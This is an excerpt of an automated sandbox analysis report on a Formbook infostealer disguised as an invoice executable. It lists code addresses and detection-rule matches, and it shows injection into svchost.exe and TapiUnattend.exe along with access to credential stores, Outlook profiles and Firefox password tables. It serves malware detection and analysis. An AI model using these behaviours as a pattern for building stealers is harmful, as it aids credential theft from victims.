            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035F95C36_2_035F95C3
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035CD5B06_2_035CD5B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035214606_2_03521460
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EF43F6_2_035EF43F
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EFB766_2_035EFB76
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035A5BF06_2_035A5BF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0356DBF96_2_0356DBF9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0354FB806_2_0354FB80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EFA496_2_035EFA49
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E7A466_2_035E7A46
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035A3A6C6_2_035A3A6C
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035DDAC66_2_035DDAC6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035CDAAC6_2_035CDAAC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03575AA06_2_03575AA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035D1AA36_2_035D1AA3
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035399506_2_03539950
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0354B9506_2_0354B950
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035C59106_2_035C5910
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0359D8006_2_0359D800
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035338E06_2_035338E0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EFF096_2_035EFF09
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_034F3FD56_2_034F3FD5
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_034F3FD26_2_034F3FD2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03531F926_2_03531F92
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EFFB16_2_035EFFB1
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03539EB06_2_03539EB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E1D5A6_2_035E1D5A
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03533D406_2_03533D40
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E7D736_2_035E7D73
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0354FDC06_2_0354FDC0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035A9C326_2_035A9C32
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EFCF26_2_035EFCF2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C41CD06_2_02C41CD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C3CBD06_2_02C3CBD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C3AE706_2_02C3AE70
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C3CDF06_2_02C3CDF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C453906_2_02C45390
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C435806_2_02C43580
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C4357B6_2_02C4357B
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C5BA906_2_02C5BA90
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0323E3366_2_0323E336
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0323E7ED6_2_0323E7ED
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0323E4536_2_0323E453
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0323CA6F6_2_0323CA6F
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0323CAE86_2_0323CAE8
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0323D8236_2_0323D823
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0323D8586_2_0323D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 035AF290 appears 103 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 03565130 appears 58 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 03577E54 appears 105 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 0359EA12 appears 86 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 0351B970 appears 241 times
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: String function: 00445AE0 appears 65 times
            Source: NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1732645574.0000000004803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NVOICE FOR THE MONTH OF AUG-24.exe
            Source: NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1734065018.00000000049AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NVOICE FOR THE MONTH OF AUG-24.exe
            Source: NVOICE FOR THE MONTH OF AUG-24.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@13/8
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeFile created: C:\Users\user\AppData\Local\Temp\pyogenesisJump to behavior
            Source: NVOICE FOR THE MONTH OF AUG-24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2352394238.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2348326527.0000000002FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: NVOICE FOR THE MONTH OF AUG-24.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeFile read: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe"
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe"
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe"Jump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: NVOICE FOR THE MONTH OF AUG-24.exeStatic file information: File size 1361303 > 1048576
            Source: Binary string: TapiUnattend.pdbGCTL source: svchost.exe, 00000001.00000002.2139621722.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139603424.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158542125.00000000004A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tStjsTMXwkdtbv.exe, 00000005.00000000.2059651187.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4158279417.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1733167677.0000000004880000.00000004.00001000.00020000.00000000.sdmp, NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1734899159.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2043430913.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2041503834.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.000000000339E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4159644521.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4159644521.000000000368E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2163789613.0000000003197000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2166105453.0000000003348000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1733167677.0000000004880000.00000004.00001000.00020000.00000000.sdmp, NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1734899159.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2043430913.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2041503834.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.000000000339E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, TapiUnattend.exe, 00000006.00000002.4159644521.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4159644521.000000000368E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2163789613.0000000003197000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2166105453.0000000003348000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000003B1C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456907740.0000000029F6C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000003B1C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456907740.0000000029F6C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: TapiUnattend.pdb source: svchost.exe, 00000001.00000002.2139621722.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139603424.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158542125.00000000004A8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: NVOICE FOR THE MONTH OF AUG-24.exeStatic PE information: real checksum: 0xa961f should be: 0x1560b4
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_04118000 push edx; iretd 0_2_04118001
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414856 pushfd ; ret 1_2_00414857
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417869 push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417821 push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040717F push 00000019h; iretd 1_2_0040719C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004061B5 push esp; ret 1_2_004061BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403240 push eax; ret 1_2_00403242
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412268 push ds; retf 1_2_0041226D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041222B push ss; iretd 1_2_00412293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041AAF3 push esi; iretd 1_2_0041AAFA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412285 push ss; iretd 1_2_00412293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404BA0 pushad ; ret 1_2_00404BA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414562 push ebp; retf 1_2_004145CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414566 push ebp; retf 1_2_004145CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00426D33 push edi; retf 1_2_00426D3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418DBC push eax; iretd 1_2_00418DC1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E4C push BCBDF130h; retf 1_2_00401EB7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E3E push esi; iretd 1_2_00401E49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401F00 push BCBDF130h; retf 1_2_00401EB7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177EE push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177F3 push edi; iretd 1_2_004177FC
